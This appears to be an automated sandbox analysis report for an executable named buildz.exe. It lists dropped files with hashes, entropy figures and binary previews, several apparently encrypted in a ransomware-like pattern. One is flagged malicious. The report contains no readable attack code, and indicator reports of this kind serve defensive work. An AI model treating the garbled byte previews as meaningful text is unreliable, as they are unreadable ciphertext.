                        Preview:......x.....S.,w.0..R.)}..XyU..9..!...o.(..............QP..0JH5g.`...0u..O..S`..K#....(t>.iw..".e]...I.......5X.~=.........K.....".kk..6...>Z....f<..o9^....;.p.Q@.(WS{.Vz.....1..y...;.0..z..c;..L..5.@../.R.?...../...f,.~Y......:..S.3T.C(........(..n....m.....b...e.q..&D... 0..#PFd.<..........7o..c...d.'.W.l...yHP..].z..Y:..H..._.....US.{.N...F..0?U...7..a.....S..W.F..eES......;....YEGne...GI>.b...7V..>........L. .8<H.G.b......[.k.X.1....me..W....]...x2.....u...Q...jZ.PY.......g.C.u..._.%..F..3......^..,S.k.d0...q.U...E'.&..=..n"..o=(...o..-..%.\..G..i..m\....8..U.B...H..6.V.w...B.T..q.Q.0.1....HkOS......w....V.....!.AG.:..{..e.a=...s.Vy....[8o*.v.IApv......A......(.....v..R..~......p.q.......Z.%.y9:...^.Q..*.......!S...m..\.9.f.L..c.....Y:[L*PZd.7^......D..?Kj.....c.:%.d.6.VC?.N<....).v.%k......j.Vs.AR..k.z.3.....u:N#.T.;u.T...N..G......L..X7..|...%Y......C.......`.....9lQGA..(....".cYX..".t.....#.....M.A.....UEXs...b.~|l..e4.X.u._d..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2104
                        Entropy (8bit):7.928603409822286
                        Encrypted:false
                        SSDEEP:48:HXAmttJUBwuHy80j0pfKSsuNTfV7TM/CbFMcQKjSchlOKjwcUD:3PJAy893FfV7TMqgHcA
                        MD5:1515CEE97CF15DFC5D07E6CF4BCE1886
                        SHA1:F14A94B2EA002AB5FA0E0A3A6E46DE624F00D767
                        SHA-256:832052F294D85B78B4E43447AB834D147174DDDB747858B4711B58291B34851F
                        SHA-512:9743FD12B59BE72422D47ECBB0C2A1ACF3B501EFDF1A3D7E93B544B88273DF843AD6BAA258AE8676BEBD13544268D930330CD9E69558D4555FB018147E7E1EA7
                        Malicious:false
                        Preview:h.t.t..Px..2...y1...qikq...\..0...Z..Z...$.g.$j.#g-.n...6.s.O...~G...[....S.h..I..9J).....X./........6S.E|.g...g......W8.m..a .....8.........z X...df.Rp.E... 3.f.<<.A..j+<..>.&....X.?..v.3.._..<.I...z;.?iR....(.J..P%./......m.}.0.+N.........~.h.R"hWEu..5.X/.......n.V...h1.......I.76.f...;-.....-..u.8k..U.....QfJC.U.~Gx.'..d...V..a...9^y`.<..9y8..L].r.e.K.&%...O$....\....1....4y=.P......1l.J.g.....?..2L.mU.5s......|..a.[.o..)..a...".._+.w8.....6w.7xi..4k05.xT.X..W..M.. ../@.>.r.....~.3..N...%6..*>.....2...]..C....O}..~..K.D0=...;..jbFb...E._.Ja.<.+.8....7....Rc.....R...KL...nK....g=..A....._...........Bt..g.m.....zZ...........w*ZIE.,L..uOW.m...gy..s.#..K~...3.U..}..u....>...y...,.....=.rzF....U0../....QH.;.j.....s...HB..J..b.?B.....9..%.F(......K.PHl.y.E..&......._X....q.....v.M+.~..:..[.@.y...^...*M.<k..=.DS......F,...Ds....,..E..."......*.OE3....Y.)..,.L....,.i.2D.\.Jro.....".y...*....4..v.`.n...^f..$.C...#U#....=..'.D...z.c
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):836
                        Entropy (8bit):7.729705163905824
                        Encrypted:false
                        SSDEEP:12:ZTpUK9rdUtqcLaAyOQ/a8ouyWf9SuLeUN1pQWAwjVhh5dofNYV26Gcii9a:ZTpzCtq/n/zH/9SuL9N1qJW1GbD
                        MD5:B79EF50A39DCBF6D140A5FD98B168865
                        SHA1:210F1680329B48D053125F549882A9FDAAC00034
                        SHA-256:F71FB9DE2405968D7C8F535D8811995F1EA41AB9679B8188C07D37C1277336BF
                        SHA-512:FD5A20E49004F0B0C6B4DF7146094959D930D4EC160EBEF1B8EFD151C98A38610EDA9B787D37C83DDFA18D4193FE0109607EC8926BBAFCE79688AEFF7913254F
                        Malicious:false
                        Preview:.......<....uJ...?.eD......XGd@...5.... .Q....x..`.i..7.4.H.\.]...]..e......`..i..."...KLw...-.....".|.....k...X...N.t..G7=..U...v4I.).4?i.U.j..+..|...n..+.....D....m.+...bU.J...iQ......Y7......N.....3.Qc..N....0.....Q4v..{.....?U....I.+...{g...q]0.y.{...f5.w...@.a..R......:....X..._w...T.T.v.$.T.....]C...N .4.}.9i.......,s..r....W..,...w...I..N..P<...U|.Om..>n.1a.|d.]..d....WG.PWYw9:...J..9.g...o..2{...t..5..B.&...X!4....w.1.K..<.T...."....j.\fK.od...i.e...,.......!..[u(....s..Rl.........9d.c..,0...g...3r...H..Q...%} ...jR........1a...y.....Q.'0.s.,.......p..;$...yDz......o..k..'.\X.....*.. ......+.w....jE....u..].Re.y....tW..V...^..]..M...^k.........g.Ta...k.v....C..C..dX...cu..'...yTu..M..9.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2104
                        Entropy (8bit):7.899506750282464
                        Encrypted:false
                        SSDEEP:48:3jaA2gQ88EsolR+nX4SNpdVcqkfGLi6jWCoOHB+iqCLpUD:W0Q8BR+nJpLhjWrwZpA
                        MD5:7F006715CAD54F8308BC6F620A4DC9B1
                        SHA1:D5EBE3ACF17F3D6074E2A7B9852D1FEC96873682
                        SHA-256:4D336FF89D990929FE3C04CF0C2CAFACA0B2DE139CB7FCCF49B2A381FAA400DD
                        SHA-512:0D6B9AE9376213041D5C6B7B8FD803C86BECBD6AA19BBC8C895C0D0B97D3CEFE1D229413D0823B93B869DA9066271CAA4E17A2953A4A0EB589242A0D4CF6105A
                        Malicious:false
                        Preview:h.t.t.pvv...6...X...P.#sS......hG..=jh..A.@}.sNszC.Q..\=.`..9=Z..T,.. tx.j...0._TOb....F.Lt..a;.g......L.c....s.i........8.?......80....1..AX..&n..X.A?V.K......B.`+ad(.p...6./...7/.....JR...8.[.HV..a...A.._.X..!.......t..Ee.d..0r+Z..{..4D.0vI+.a..'..8F..ew.<.G7,%..fQ....6...........|X....A..Y:....d.!.pd<t&.....;.-AG..<....kh........V.S..<9kTh...f.U..NW.{.l(lt.^|#..o...(.7..}3....k ....d.zP<...._...f....N.Ma.m3...4nUmc@.p..'#"..?:.....Ul..y.z..t7......E..'==.P......_5....qu..}.. .Qb.7c.......(...>i....M6....k2.@.,...r)1..o......xF..H.P.............H.T]p..TE...u.&.Z......B..B> ..af..<......V.Xo%.=..../f.".X...9xu.z~.m7|#...<.e....k..cU.....8.I..U.m.m...w2..%2.u.B.A^.S.>.7..............v>..o..kc......jP..G.{.......$|...kJ...\pP0..K....b..iD%.;....[..k.1G..3#.?..P..he.B.W..<...MrP...2..[5....r@W.....G.^.O2<.S.gT7.m..V...... .}Gy.^..O".a..G.....$wP..E.]..3....?*4.....1...g...N......m.'...D....r...Pz...q....O7M..3.....r.TZ.t.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):836
                        Entropy (8bit):7.7310092677045334
                        Encrypted:false
                        SSDEEP:24:wSVdGchWoVD5bH5MxrZgF95muCxxVWQ7ItMcBzM0GbD:w+d9WoVDVqxFgF9MukIZMOM0UD
                        MD5:C00EFD15A5F306B70842B35803A0B288
                        SHA1:68B8870331284FC2B455C816C6739A79B92B13C6
                        SHA-256:A54742F08951F2FEC0FE54BDD21B6123A04356C29A184CB7F229834B0DB9143D
                        SHA-512:48492EA22BE47002330E5B3B3CDC74E92CD4F6A3E3EED3B027AFA39A7E966DC25A286FB04A5500DDD31A9370CC09F64D1BD59992E888C3B01C5064323C1BDBEE
                        Malicious:false
                        Preview:.....,..&"...Q ...[<..n:.....+..;....k.8.p{.kS..`...}.. iPcsO4...7".sF.&@.s..)..-..D.p.>..c..2...T.{[.M1?.6'e.-....MfE9..:..>.#..l....xKW..'$.a.[...O.%$A@\KP=.v)...z)..R| ..+u.L_.i...0.....HN..0...`j..-....[V.....$?%44.ZT.qt.v......o....../..*l....^w+Z...K...zj~...82......X...3..d...s...7.}.&....{..G;.A...t..9R...)x....F.^>.....9..:.Rj..o........).?..8....g[.iDl.!.8..\.(.Ux..L......5..+..$X..k^.0wvH.^........P...~A...y.C.F.^..kBH.59........,.%...n`G...h..kQ....TA.._...y}z.....A...Ue$...s..+.aC......c..&....b..$.K..8..z.7_.YF..o.na1...~.0\.b2....K.=3.wy.`.W..,..]..Wr..y.....4..r.I.AV3cF.)...+.Y.f.P.5.8...N...q7.~s....K.OR.y^u..h...mb..=..C..M...../B&..j....6;..cv..sK..I..&.2.Z)k+..........&.+.=t...6...L|.v.3...,..wEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2104
                        Entropy (8bit):7.907049252301014
                        Encrypted:false
                        SSDEEP:48:lLmJNBq1n0D11oxL6zm0g1AG+/9xpH03BNsZcUYAaUD:OqVwoxL6zGIpH03k3wA
                        MD5:26A043A24199653D21996F1D623A1450
                        SHA1:42B2C50A59E3DE7431AFF2F7420894E317B97E7A
                        SHA-256:1190069EE3AB976C50F15E3090A9C76BBA91E1241797F3809C352F704F1663B6
                        SHA-512:04870685D5122F8E3D09107D35AA39148D323A1D8181CBB188FA311D540CC4AA903C4183E321EDFB90644C05614C48E46E73F94127A0BC08CFCF395516EC88B6
                        Malicious:false
                        Preview:h.t.t.....!.T{....D..Y......2/w2.t.=..N.p.w.G..j..F.D.Q...L.)...\v[.)p4.$......Y..n.;.'..5...h....L....h:..........6.A.V..,....M9;........8.....z....`......T..i.Q.U.G.z1..w`......iZ......%..Y.....r....I.B...-h.tnE.Fs........X...\E..,....D*..M..9..H...$ .=))...w.`C0n.E.L?B'...V.[t.b..Yz.+..?!..:e..^.T...........>..E..4X..f.....Z..4]...Jpr...d.Si..n<>...1G..*...[Ml..m..V..L...........R.B..r^...W.... .v..K.0..^.P|^..3........(.@...).\CT.}."...nR.a...Jc......x...!-m..R.....xR.y.Z.8P.....=..&w.|w.U...[DM.....$...........4<..8..A=...o...%$..Z{...=1...bB....H\).2DJ..7&.JA..pMf.P......\}.Z...=u.....Y...C....|..dv..(....+.=..*..c".._2ZV...@.{.........e.Z_....aF27.A......S.^@]ko..............Q....[...#......b.Qw...D.T.o!.6z.:...t.^%......<....Qb..........j...../_...F4U..yxGdvm..t..yS:+.}U/...:.....;.#..&b..L..?kx..(..s.#...".Et.......e.....Y...5...!+0.lwkoP\.b..5.?..@..Zg.~..z.S.G.h....D.r....y.......q..o..i...l..<d..|...!...>.......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):836
                        Entropy (8bit):7.774638382434001
                        Encrypted:false
                        SSDEEP:12:QiR0GVb81r1MpecEkn2fScRnPuC9h4wuF65Ybe+7fALzuS4JPCL/26Gcii9a:QfGVg4p+kn2ndrh4zSYy+Dwzh2CzGbD
                        MD5:65513F38E50BE00B0F9F10B47EDE42F4
                        SHA1:C9346C64019FB32927AF13ABDD73CB7BD75986F7
                        SHA-256:D8DD1265DE517B46EFC67FC96ED67E81E6D77C887CA7464102A44C16EEAF0E32
                        SHA-512:048E48A8730D35666316BF074F98B96696273E76229210727EB7A6248D9F8C21A9CE97EDCCA4D175D361070966BB4DDC5C2FE4FCCF1F1DED845EFF5379B3B13D
                        Malicious:false
                        Preview:.......6_e,.....EW..C....9.1....J....(/.X....b.8....MR"......9= .b..a.c{.'.Z.u........x..+......'....0w.w.h..'1Ek]..r....l.j.H.`.2...A.mN.vSH..)........~Z;.Nr4......*..a...s7.zO........^...o+.}.4.....;.(;M.....y.O.H&.^t...+..Kc...v.ao.]3a.....u.u.d...z..V......'|....l.....=..g<..8j..FG..S.;ZHj...~hs..L.....b.];..I.Ytz....0......Caq.N.._..wNmmm^9........W.i...K...^N..w;.".kT.......K...[.z..vi.6;...7E`.,\eD..g?.x.....(.....*O.....r..%.$.vrF.b.g]z#..L............[....rIY.%..vQ....t..............tw.4.(.i.Hv\Q......6....;'....J..Y.:....._xP.s.=&....&.......^#....2{........:..:.&..c...O).)..l.....I..c......(L........nIb.r...S^w...g..3....0p..Q.....9..........[b~.F.......x......_....."3Qo....^+r...).. ed'.m.f..K.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2104
                        Entropy (8bit):7.91341198973656
                        Encrypted:false
                        SSDEEP:48:dtTeD67NkUVpk8YynZUZYbOjcALbOFAXx11U2zEOBNwuNc4/2HUD:dtS67NBwZgO4WbOFyx11U0jr8HA
                        MD5:AC688A636F3648C532F24F98FDEFCB83
                        SHA1:AA77B5FB90B90B4C6CB6E19661FF21EA7BD30951
                        SHA-256:891A66542A908425439015DFB8810250536C1497706260C25518A3E613B768D4
                        SHA-512:EE17467CE8F89E9CC369FDD40D8403B42D3EC9070F9E8067A35685389695C9CEB4DDA9580F82B22DFB962B1990A46AEEA17B21ADE39B9F33E0565BE84DC22C4E
                        Malicious:false
                        Preview:h.t.tF]......F.V.....?4....$..S..fTW.!..6v....T...og....6)q.T...XZ.^.^DB...>..|..68..U:...F"Y..._..: @.....Z.....}.Hz..!.\H. .\....P-...u9}.J.v. .2YS_..2^.$J.....J...-..<...I....#Ki.pf].D@/|..J.. BdH..<AOlM5...r}....,..X0.}..R..........>J^....T..T-.$S...n....:...$.?=O[..c...E..._~.2z...i.a.......M...r.....q...'...L&t..4v..j...AQpd...S_WmtT...V.F....R3gi...`.8.x8TA.].b..n..Lo..G.u.l..b..RJ.t...]......}..w.k..:..j.f.y.,.?...)l.<.)V.8...?.GIc.@..d.......[9..Q....l7N`.1#..^.Mm6.....&.....l=.AH.......s.........8.'.. .(}..H....x'<cs. ...H.9....&}h.3YyB%.......Z&..30.6+..2{.'*./......w\#[.'.4..7#v.].bU..xfV..f.P;A.lLk.L...N.s.C.q..:....~. Q.6#.>...0.B..N.....2....~...f...%.7.Q...aXb...1......M..s.7'._....x.i3.3."#z.).~..j1.#.LU...=..*\.=.Y.p...I....K}5=.......2.p5x....d.....72D..d!...:..v..2....LY..OzV.%N...&i..7]n..W+.R..|...t.:vM8.. Gh...."".;..u..w.2.9Z.7..KW..W"......ul{}.[i,....S_1Mz..wj.6k..j R.}8....7.b.@..u.......uG0......_.*4......&a
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):836
                        Entropy (8bit):7.736117039315725
                        Encrypted:false
                        SSDEEP:24:S9MTqukxTOQ3tQisKbCcxiptgSaw+Xw0B0xmMekPJmYM2GbD:5qukxTBZbCcsgA+A0B0ZrPJmEUD
                        MD5:98CC182D4318F8F6DE2D7C6812F9428A
                        SHA1:59AE21F3FC9AE70920B6F0CE4329048F8DF541D6
                        SHA-256:9FF681F751406D25154CBC4A79308FED453BE1D0C309FC8D11E7208724E55BD1
                        SHA-512:602DF082DFDC54094D543B174B80A1D11B87C2EBE7311D4E42F92492D889B458A755158A02871B8B01A2F7B2D3F5FFE4406A2ED8916366A3FC60AD33BBD6380D
                        Malicious:false
                        Preview:......{..h.Av.OdE......KO..C.A....pz.......qj..CU....5K.u..@/....8.r...p.$Im.R6..jh..vf.C...X.Ob..Ld...P...5....M,.x....<..Y..)Crx..csZ.m.Z..F.4....X..m....Y.l,.tb....j:.5-..GT....t..f..REU...b.>!.....M.....jt..Sp.B0.w.<....`.H2A....D..z...+..8:.c,..O....O....{(F.w.%m...C...L...+.*&....v\..a..<S.%8;.....H.!.t...)|%....I...{..; .}.......5..~\..'...\...q.K;`.>.r.>.....\g{.|.x*u/....<!.H.........d2..\"g..@.'.Es.C.'..2...v.Jg......L/....o...#0!].......%.I,.%.....I..7...{)g....`.J!%......xu.....;......p......8.. .On...H..5..4.r.yb..X..? ...H+.......X..7A5|...d..D.}.z!7j.Pat...5.. ..(.A...5,.:....}/.U..R..[.....M)..d....l..L+b.@*.;-.%l.|_n.....-.$.......*..}3...=..g+.k..E.;...c.|!...Cp.y.<j.....9.gu.c.B.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2104
                        Entropy (8bit):7.910166795547244
                        Encrypted:false
                        SSDEEP:48:Mqi9j2+nj+l0KigOyxqo/pI6C1PFBQeRtPrME7NtRUD:MH+KLgOiHI6CxnnRA
                        MD5:C84CAB3E9A5E1CBA4FEC8510FF0919D5
                        SHA1:14C9732D339FBDEAEB3E4F75EED59597D01453E8
                        SHA-256:26ED092420D31A9FF4D6DAD22BDB7DECF4033C5A0034D55503E526F8AC0F8766
                        SHA-512:6FC87C404F2B54DA9F3C069817D2358D0D650910CB563949BB1D7781E45307F8E98F7B4572CEFB513784E98EBD99AE6FB19147EFDFFCF66A86F4DC8E9A492E8B
                        Malicious:false
                        Preview:h.t.t.$A6..Mc^.jo.\_..Yl.a..+.~].s.#........!.tq.P(.E|..R..t......5.}L.aNE.H.....TJ.%Q..~.w)Y.8o....6.la..W.^.JG.!q&=m.n......d..Y..H...=.b.#.1..U.y'..%.U..f..........9.v.\.....v..N.C.m,...U...AZ..3..#z_.../R.._(.d.....4.~.}E1...a9d#n`..I.~../ap..4.9..N...z.S..R%A..cm(.Is.?..r.t..1;..T)8..N..... .....C.B..f..6...=Y...0....R...p.....n"..R...L.s*.,..9.F.f..Q#W<.e....5.o..X,.|....kG..kp.1..Y....z."..)L/8u.L.s.X.I....(%9........,......h../.m.gs.!\N..^(S...X.....Y..'..{......e}u..n{L...4.4...`>....]..h.*..K.......3..e..Jn.<.S...z..F..+v....~.Fn|.z.rU.j&#yv[.*..o..mO..F[1J.....<...D.5...t....3.?.UhuO.J..&.N...x......U..D.eip.mw..6..[.\_......h....Uv[sH@...$e.]..yj.\FW..x.......Z..y....ZP!.3...g......j...^.U^.,[Q..A.......s.I(X.$%x..y..s..5.....U....[-%......U.....D...Y....[..CQ..Ylm...E.....k..g.+]Rb.[...8a....9..WU..!,.G..oV..5..............;.h..7../B.'.5.l...B...c..i.Rg......cR.$......../......p.g"a.......Go 3LCsyt...h|U..F...Wj.`...i.X...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):836
                        Entropy (8bit):7.7351691272388114
                        Encrypted:false
                        SSDEEP:24:YL4RYYl+T7tY0SBXuzyeSMqUCHjJ/3ItMu1B7GbD:z2Yl+lSZAJ1qP1JM1UD
                        MD5:21B389F3276C458A1D719054774A1C72
                        SHA1:3716F977A0E9DE2B4784C37BFE3731D6F3E5D2A5
                        SHA-256:2C4BD235F31078F590E0CF52A32020138BE7CB8A67978A4E6A39E22FEB42AEC8
                        SHA-512:C1651FCDD1F56620A495AC740FEDCF14DD7078A1EBC7CE61C63338AC0D87BF8122E5099452E6480EE5729F3B625EABACACCF2A07FAC8984885367EAC248189A8
                        Malicious:false
                        Preview:.....D.k9...N..m'.E.....I.'A..8....z.G..1[..N.......XN....~....].i.j.}.,.i..%?M..hu...6.r..a.;m...F....%?F.GZ.~J.......b...5N..E.u.L... g......!Sj..2.....`w.F.`.-m....'J.Z...c..x..$.j..H...z..8..&.5.f.Q.....N........pb..R mT..r...+D.*.O...h.a..K%v.<..j..m7.<Y.^.`}..k1.j.....Ac^....~.G>..... .0..A...-....=......,.#6.....OSi...O..|]....T.}.n....B..A...0..`.#.F.)>......ff.8...ov.......b3..k..b..K..\....?...7...2....{@%.......G.*..t........A...T.WV@.....?O@...l{.....l...4.:....pcM.k..NnN.0.O..g.:9..(f.......J.....Bo`...k.E....y..........{..o.Y.^B.......)..^....:.R..U.{..p..H6..U..a.@w ...xl&G...h.f...{.......;.H....>.@.O..C..$..eoz.u..E...59K1.\-..W.S.U...^.].=.A..L...j.{......V~.......4.[...H..&$%@-.J....`1z|...t\EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2104
                        Entropy (8bit):7.9198107928085975
                        Encrypted:false
                        SSDEEP:24:aITGR0C9Rq6ZGQ8/R3hEBno2DF8NiOjyooNncMwco6xXlti8AjqV1SyqLV5AANt8:k9R3GQaC8NiORHpcohjr1V1NdUD
                        MD5:89D0971AC0616BB04708A1D98FD23538
                        SHA1:0A0DFF7FB6E0F1650FDBD36C4973873B1948A592
                        SHA-256:DF583A441276F398EDD2DB304951F3CEB1CB0EB3FAF2768DBC2A71CEB60C05BB
                        SHA-512:9FA37FB21016906AFF8DC8AECE2AF1F89FCF19031FE6B817B4DDD352953D7AF49D0E32B65C1C5EE9AE6CAA32C86CB50BEF8945E67F5E722C8B23AA47945D7111
                        Malicious:false
                        Preview:h.t.t...vm......9.2...V.:u....,....g.....q...(.r.........Br.<...f....7.x(..~.....3.B5V|q.x|......Z5>A....E`...PHX.a.....p!t.iZ...e.~,W...>r75dL_.S.).o.W.T.N...D..3...Fb.;.,..]........Z/....].^..{.t|..}..%H...,.AO....z.+........=...t.......t..xX^...)J{..lfA...dl.9.R..hn%....]..f.....'..z.C.........Ik...m.rvw1.).6w.*.......Y9.K.,.C....^...P.-....C.a..&R..HcX....d.H.."..z._.!...|......GR/P.W..b....b"...2...]...+.......K V.......U.ab...),...?...W..s..g....E.k.>s*7..^...qK..NLy1.....$k...o........I.g[.4........N...>H.0..[.'=.Dj@.j...,_E.9......._..E..8Ng....<.z[x..\[7..D.....y5.Te.hz..#,...|.8.X.[?\...Z..R<.U5].....FX.R.Y..fz...Q.!...hW.K.U....k>5G.F.8G.^f"Z@_hMg.R....h.wv....J.....4!.r.Cm.Y...o.e.-:........7..X..x.E.a....r.-.,.v..N......e.q'&..8...X/..N...&.X"1;.oy\..)`......&...C|z5......C.%..!a..].n.|..'..[B..d?.r.....7..x.....6(n.cq..=b...`........`.D.uP.@_.......J.y%.ck9..955.Y?k .(.....m..u.............%4.y_.8&ox...%U.J.j..H.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):836
                        Entropy (8bit):7.726407336651515
                        Encrypted:false
                        SSDEEP:24:QS8hNn4yoXVfWPASY70GZwdpeoDPPSGbD:ARBYVfW9Y4vdbSUD
                        MD5:919907BEFBBEE553CFC9BE0E241A34DA
                        SHA1:CD23DAE0EFA89AA17894FDC3F2E7B12F002AB729
                        SHA-256:492367991B3938C60DEC499C4D83243B7F706C95A432E4A940C96B4AAE342889
                        SHA-512:FE8FE3CD5E905FBD5B51F7FC5098F89222120B76922DBF9728C0218B8B6E82B8D177FB5DA88A25D46B6478BE2420FD6C35832D55E7161BDAEDFE74E0D96428A9
                        Malicious:false
                        Preview:........~....\..zj.l.8..1..;...h.s.Z.>..[n.Et..S..v...m/{....?....9.^E....G^.]9C.-..>..)mH..M.'..?..{.~..G......_..\G.!Y...h..I.S....zqs..x.../...}5.......G........j}e..^lZ1..AT.....M.=.8-.B.....I....x.bx..U..].........*......`..*]....2L.eE.Pfj..g{.p3.M..I6..W....&b............Q.[R.%.....Q+............x.^... ,...v.?.E..|.YT.1(..T..\<.._...YP...J|.....5s,...G..).Z...\.3.......].P.....H.3Q.3..]....".:.".V..p.. q....O,...1{.........q.<..Z9/.<....-......(Md.L.5,..?..5.U....#./@ig...Z#..m._..4.s". .N#...\y..?w6..\mW./6.H["....j....7..Su)..e..x.+.d{.0n......G.Nm~X"..p....f.k.b.R.G.......N..i9...cY....1.tx9.{5..R....}.aS.|.5.5...C.M`.=.E.6.%S.k.G.._.Q&S.)..9..5S.P...[>129P4........O.J.is5@...R-/Th]uZ..@_\Fn...A.#.1..e.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):91794
                        Entropy (8bit):7.998094857472224
                        Encrypted:true
                        SSDEEP:1536:UJeyYv/A/XGbsptTgdeoxIDdR9hGj4rT0tjUNoskLCmv5CE/KrI1VEZA:weoGbmTxMKfAtjUr+vYWdqZA
                        MD5:AA209A4FB6F03B9718233D01B04F2419
                        SHA1:073532297287243A0B2BC25D29BB16F92D55A02F
                        SHA-256:24B457B368B6670F40476E5A19B11EF309A1A0A5CBE05F85BB926A39CB9A69C7
                        SHA-512:8128352077B9D9398137FB5D28168066E2873BA96656D87A03B7B0C3DC50948C1CE8056ADCEF6381EF25202719B451852AC291D07418D074A55F086F4B6BEFCC
                        Malicious:true
                        Preview:var Wv-.ID..Z*.N.)~e..n..Q.t*...........W<2>.dK......_....)n.R....-.8....X..:...:...t......)....=...4.........-o..^..x..A...._.fV#|e|.L...aR.R..>....%.a.:..scfw.("A.....nT.Er$l..."........*.......J;...aP*F..DL?...,..O..g.]..D.A.~..._--+M...1..w...<.KY0.)....3.......>.=.......%. .....e..b...(...7.w...=i..A.G.?....ov.p.......Q`Y..&..0;..D....<.X..i....Gr..R...$..s.\4....c.....Y.SVy.Y.p....U)d.UhH..V'..K.q.._&...{.w..%R._X.......Zds....3.@.yK)T...lX'W..h."7....gE...t...=.D2..N..w.R}..k.y...A....}...rR..MS.&..p\.B......\....f..>.p..p......D,...M\...XN..DUd...$`....k...&..{.a...f..X..7.p.......P...{..V....$A....x<..=.(.....:.5....aa.....Po..W...c.Fu...{...^..W.9.O)...B..&........[..f.U...Q..|.8.nM.} .8a.$I...X..w.._..B..ay.V).../*.wlO....G.X.E<.8....x.?.{...[J.x.I!y..Dp...A.......7*1.2.=..6.`..*......m3....T...YuU...\..S..UP..y..r..Z.5...K.....l.....u......<:.G..6.....u.r[..X.)...&."6. .0.'...:.5....W..R$.4.-z_J.Z.)....X.. .u..[...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15202
                        Entropy (8bit):7.986752437911987
                        Encrypted:false
                        SSDEEP:384:93XWwDhNiP7V76LddEgzF5YIYZmnBgQFjZsTBA:VRD/OlYdEgx5YI5xFZs1A
                        MD5:E657377430913B172238F527B14FF838
                        SHA1:FF8B1AE6255BE752A71B5312AFE44480D004CFDA
                        SHA-256:CD3E620524B00CA61321DAAA977626C59ECE94273C8A5937416DD38A62820170
                        SHA-512:5D2530B7A66CC8CBE12DBE10891E32A081D1CF2494B8324F5D8CE8272C8DDC0EC8639508E74BA042BD860FD7BB52622C97648ECEE5DEA90922E6F87EE6B8FCD1
                        Malicious:false
                        Preview:var W....D!.......uZ.jQ../&...I8..J=...Qd.|...X.hO..s8}..N!..u.....x..5N.s.r-d{._.?.@.[FN.B;.......x...)u-..Uhv..__..Z........H..e4|v5.. .X........VzL....v_..'$.F........:.)...(.f....8.g...<....#..-........IZB.~:..s.....c.h|:.#.W!.j.~.|.kX.)...&Z]O........T.B/w....q..8kWeYT=...9tx.....m.....y......N...y...l[Uw. ..r<..go.1.m.G..s..s...E.p.......F.C~..F..3'.Z*..N.5)#.3..G...}.~..V.P..*1E.ljT..m.B..)S........c..[@\cP....z.d#.V.....}..9.:A.".l.~.....$~&+........K......,...b....%k.Z.k.f....n.....h..a.....zn...).2.B...W@Q=9Z.....Xm.-..5f.M..v..D+.NI..!..)P..Uh..."..h..X.............s.t..)...>..{...a.+.6....}0.D.kfZ...D.....\.....y./...f...<.>...Q.B...&..:.....9.#3.-....>ICt.X...:@>9...T.^q..k.......B..2...t.:.8k.m.T?.H..;..}.O...H.5.t..n.D.Y..1..B..(.e.`F...t.4..dL..]..r.b..K.Q.<..2...$...^'5..o1p.!jW..S.....Q..Vy.4.X..k..\=M.{.|.1.xi...v.#...S...f.|...R...:3@)...n.a....<.7...:?*^{M....u......~}...Q...8...d8....^4...j.7nx!>.9P....w.e..4..<.e....Wg^
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1284
                        Entropy (8bit):7.849554817951962
                        Encrypted:false
                        SSDEEP:24:HjexAadb6nQuxJBHehSlVWHjjsRfgmLzgBYKtBX5uGbD:DQX+LhHqljjcdLzGftBXAUD
                        MD5:4DA9BC8C0DA071DC1CD05E48A2574A0C
                        SHA1:A1DB92378E9FDF634B166EAB9CFC915E5B26D3EA
                        SHA-256:9CE53592EC7722FC00D88C66DB43B69ADB4DB437F3BDE2AF1A5BE3ECBA446206
                        SHA-512:1C8D93EC856782FB1E52E6E260F6AA21C12ED810F37FE75EDD72955F0ED17535EE8247B643123322BC0900917EE19A6FF1D3751D3A56DE13B24192EA1EFAF0BD
                        Malicious:false
